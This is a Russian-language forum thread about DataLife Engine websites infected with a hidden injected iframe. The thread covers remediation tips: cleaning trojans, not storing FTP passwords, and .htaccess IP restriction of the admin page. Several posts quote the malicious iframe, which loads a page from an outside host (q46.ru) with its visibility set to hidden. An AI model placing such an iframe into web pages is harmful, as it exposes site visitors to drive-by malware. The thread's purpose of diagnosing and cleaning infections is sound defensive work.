Перейти к публикации

Рекомендованные сообщения

кстати не факт что вот это <body><iframe src="http://q46.ru:8080/index.php" width=119 height=100 style="visibility: hidden"></iframe> появилось из-за крякнутого FTP-менеджер или еще каких нибудь программ....была у меня такая трабла ломанули хостера каким то образом и все сайты которые были на серваке все были в этих iframe ...=)

Изменено пользователем zimka
Ссылка на сообщение
Поделиться на других сайтах

+ Защитите админку с помощью .htaccess
Всмысле? 0_O

WWW.ZEOS.IN

<Files admin.php>

deny from all

allow from 000.000.000.000

</Files>

Вместо нулей вписать свой IP.

кстати не факт что вот это <body><iframe src="http://q46.ru:8080/index.php" width=119 height=100 style="visibility: hidden"></iframe> появилось из-за крякнутого FTP-менеджер или еще каких нибудь программ....была у меня такая трабла ломанули хостера каким то образом и все сайты которые были на серваке все были в этих iframe ...=)

Что за хостер такой веселый?

Ссылка на сообщение
Поделиться на других сайтах

webturist, это не выход :)

Например если модераторы есть на сайте, то тут надо будет прописывать всем IP адреса

В адмминке DLE и так можно сделать запрет на все IP кроме своего. (это стандартная функция, так что ничего прописывать не надо)

Изменено пользователем WWW.ZEOS.IN
Ссылка на сообщение
Поделиться на других сайтах

Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все)

Ссылка на сообщение
Поделиться на других сайтах

webturist, это не выход :)

Например если модераторы есть на сайте, то тут надо будет прописывать всем IP адреса

В адмминке DLE и так можно сделать запрет на все IP кроме своего. (это стандартная функция, так что ничего прописывать не надо)

:) Я всем прописываю, апач он и в африке апач.

Ссылка на сообщение
Поделиться на других сайтах

Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все)

Нет уж спасибо, если такая вещь имела место - то он уже ненадежный. :)

кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?

Заходить после смены по ФТП и менять в .htaccess

Не очень конечно, но надежно.

Ссылка на сообщение
Поделиться на других сайтах

Я всем прописываю, апач он и в африке апач.
Знаю очень многих людей, которые подрабатывают модераторами и еще по основной работе ездят в командировки в разные города и страны. Так что, им постоянно IP менять? Нее, это не выход -_-

кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?
Тогда это точно не выход :) Изменено пользователем WWW.ZEOS.IN
Ссылка на сообщение
Поделиться на других сайтах

Вообще хостиг http://multihost.ru/ не плохой, за 2 года ни каких нареканий.... работает четко стабильно вот одна трабла была с этими кодами, но они сами и решили ее восстановили полный бекап сервака и все)

Нет уж спасибо, если такая вещь имела место - то он уже ненадежный. :)

кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?

Заходить после смены по ФТП и менять в .htaccess

Не очень конечно, но надежно.

Ну не знаю это было один раз и думаю что там админа наказали))) А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP)))

Ссылка на сообщение
Поделиться на других сайтах

Я всем прописываю, апач он и в африке апач.
Знаю очень многих людей, которые подрабатывают модераторами и еще по основной работе ездят в командировки в разные города и страны. Так что, им постоянно IP менять? Нее, это не выход -_-

кстати по поводу IP а если у меня меняется IP после каждого подключения к нэту?
Тогда это точно не выход :)

Мнения могут быть разными. Я исхожу из безопасности, а не из удобства модераторов, ездящих в командировки.

Ссылка на сообщение
Поделиться на других сайтах

А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP)))
Попросите у провайдера статичный IP.

Я знаю уже наоборот - статичный, это стандарт, а чтобы менялся, это уже доплачивать надо :(

А по поводу:

Журналистам, размещающим новости на многих сайтах, вообще бы для своей работы виртуальный компьютер установить не мешало.
Солгасен 100%. Только уже новые технологии, сейчас это называется: Песочница. Супер вещь!

Бесплатная и победила рейтинги журнала ДПК

Сайт: http://www.sandboxie.com/

Поддерживает русский язык :)

Запускать внутри её можно хоть самый страшный троян в мире и всёравно ничё не будет, перезапустил программу и всё :)

Есть много альтернатив, например, Returnil, но суть одна и таже :)

Ссылка на сообщение
Поделиться на других сайтах

А по поводу IP ну его....у меня стоит роутер и он в любой момент может пере подключиться к инету я запарюсь менять IP)))
Попросите у провайдера статичный IP.

Я знаю уже наоборот - статичный, это стандарт, а чтобы менялся, это уже доплачивать надо :(

У Вас может и так))) У Нас наоборот за то чтоб постоянный был нужно платить))) :)

Ссылка на сообщение
Поделиться на других сайтах

Подробнее про технологию тут: http://ru.wikipedia.org/wiki/Песочница_(безопасность)

Ссылка на сообщение
Поделиться на других сайтах

Подробнее про технологию тут: http://ru.wikipedia.org/wiki/Песочница_(безопасность)

Че это ты продаешь свой шаблон? кстати видел у многих стоит он))

Ссылка на сообщение
Поделиться на других сайтах

Причём тут мой шаблон к этому топику? :wacko::huh:

Ссылка на сообщение
Поделиться на других сайтах

Подскажите пожалуйста кто-нибудь в чем проблема :

при установке движка после "настройки конфигурации системы" нажимаю "далее" и вместо "установка успешно завершена" выдает ошибку The Error returned was: Access denied for user 'wm4760_artem'@'localhost' (using password: YES)"

Ссылка на сообщение
Поделиться на других сайтах

Не правильный логин пользователя или пароль к базе данных

Ссылка на сообщение
Поделиться на других сайтах

Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход.

Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........

Перезалил файлы, пока сайт работает.

Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли :)

Изменено пользователем ogirok
Ссылка на сообщение
Поделиться на других сайтах

Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход.

Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........

Перезалил файлы, пока сайт работает.

Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли :)

Пароль к FTP не нужно хранить в тотале...тоесть при каждом конекте к FTP чтоб тотал спрашивал пароль и вводить его в ручную и тогда не будет этих iframe (если конечно сам хостер не заражен что мало вероятно но все таки может )

Ссылка на сообщение
Поделиться на других сайтах

Из всего, понял, что нужно прописать IP. Но как писали выше, это не выход.

Кстати, сегодня повторилась та же проблема, что описана выше. Опять <iframe src="http://q46.ru:8080/index.php" ........

Перезалил файлы, пока сайт работает.

Пользуюсь Total Kommander. Ломаный или нет не знаю, кряков не запускал. Установил с скаченого exe-файла, работает, регистрацию не требует. Но совета послушаюсь. Переустановлю его на другой диск. Посмотрим, что будет дальше. Защита на компе Касперский Интернет Секьюрити. При входе в админку, пользуюсь виртуальной клавиатурой, что идет с Каспером или копипаст. Думаю, что трояны не просекут пароли :)

1. Сюда пошли iFrame, который на сайте прописывается: newvirus@kaspersky.com

2. Пока компьютер не почистишь - пароли будут известны. Если снова прописался - значит трой работает.

3. Copy-Paste - действительно может немного затруднить перехват, но ненадолго.

Нужно придерживаться следующего порядка:

1. Сначала чистка компьютера или лучше переустановка ОС. Со всем необходимым + КИС, или КАВ + Агнитум

2. Установка ФТП-менеджера (бесплатного, типа FileZilla или лучше платного FlashFXP, (месяц демо бесплатно) стабильная версия с русским языком 3.6.0 на сайте разработчика) - в нестандартной папке. Настройка на незапоминание истории посещенных узлов и паролей.

3. Вход в панель управления хостинга и изменение пароля ФТП пользователя на сложный и длинный пароль.

4. Вход на сайт по ФТП и удаление кодов iFrame. Можно затем слить сайт себе на компьютер и прошерстить основательно, если время есть.

5. Добавление в .htaccess корня сайта следующего кода:

<Files admin.php>

deny from all

allow from 000.000.000.000

</Files>
Где admin.php - Ваш файл админки, если название изменено, соответственно изменить. Например tralivali.php :
<Files tralivali.php>

deny from all

allow from 000.000.000.000

</Files>

И где 000.000.000.000 - заменить на Ваш IP, который можно узнать здесь: 2ip.ru

6. Установите виртуальный компьютер + КИС или КАВ + Агнитум

7. Войдите на сайт через виртуальный компьютер и пройдитесь, если коды iFrame все вырезаны - то "визгов" защиты не будет. Все равно проверьте стартап системы.

8. Поменяйте пароли на все, что у Вас есть. Емайл, админка хостинга и так далее.

9. Можете наслаждаться работой отличного двигателя DataLife Engine на своем сайте без троянов.

Примечания:

1. Не забудьте отослать код iFrame.

2. IP Модераторов придется прописать в .htaccess, если Вы им доверяете. Неудобства будут если у модераторов динамические IP. Если у Вас динамический IP - после каждой его смены надо будет менять его в .htaccess

3. Всегда храните пароли вне ФТП менеджера.

4. Никакая защита не гарантирует безопасность, если не придерживаться вышеприведенных правил. Даже если их придерживаться - 100% гарантии не существует. Но факт в том, что движок DLE тут непричем.

Надеюсь эта инфа поможет тем кому это надо.

P.S. Не пользуйтесь IE.

Изменено пользователем webturist
Ссылка на сообщение
Поделиться на других сайтах

webturist, ну это у вас черезчур уж...

2. Установка ФТП-менеджера (бесплатного, типа FileZilla или лучше платного FlashFXP, (месяц демо бесплатно) стабильная версия с русским языком 3.6.0 на сайте разработчика) - в нестандартной папке. Настройка на незапоминание истории посещенных узлов и паролей.

мне больше нравится Total Commander, удобный

и потом... если в компе трой, какой бы ни был у вас пароль и какой-бы программой не пользовались, пароль всё равно попадёт в чужие руки - в ftp он передаётся в незашифрованном виде

Не пользуйтесь IE
а чем тогда пользоваться?)
Ссылка на сообщение
Поделиться на других сайтах

Ни чего подобного!! Вы все говорите про IP admina в .htaccess а если IP меняется при каждом конекте? Нужно только одно пароли не хранить в FTP менеджере и все... храните его в текстовом документе в другом месте и вводить его ручками при каждом конекте...

Ссылка на сообщение
Поделиться на других сайтах

Если бы все шли в ногу со временем то заметили бы что ИЕ 8 имеет даже два режима отображения сайта. Кривой сайт - кликнул и всё ОК. Также имеется 64 разрядная версия на ОС х64

Так что не сказал бы что ИЕ бажная, то что она не идёт на поводу у пользователей не делает её плохой, да и в принципе это самый используемый браузер. По мне так один большой баг это Опера. Которая диктует свои стандарты в разрез всем, как то: Рамочки оранжевые вокруг текстареа совершенно портящие вид дизайна.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...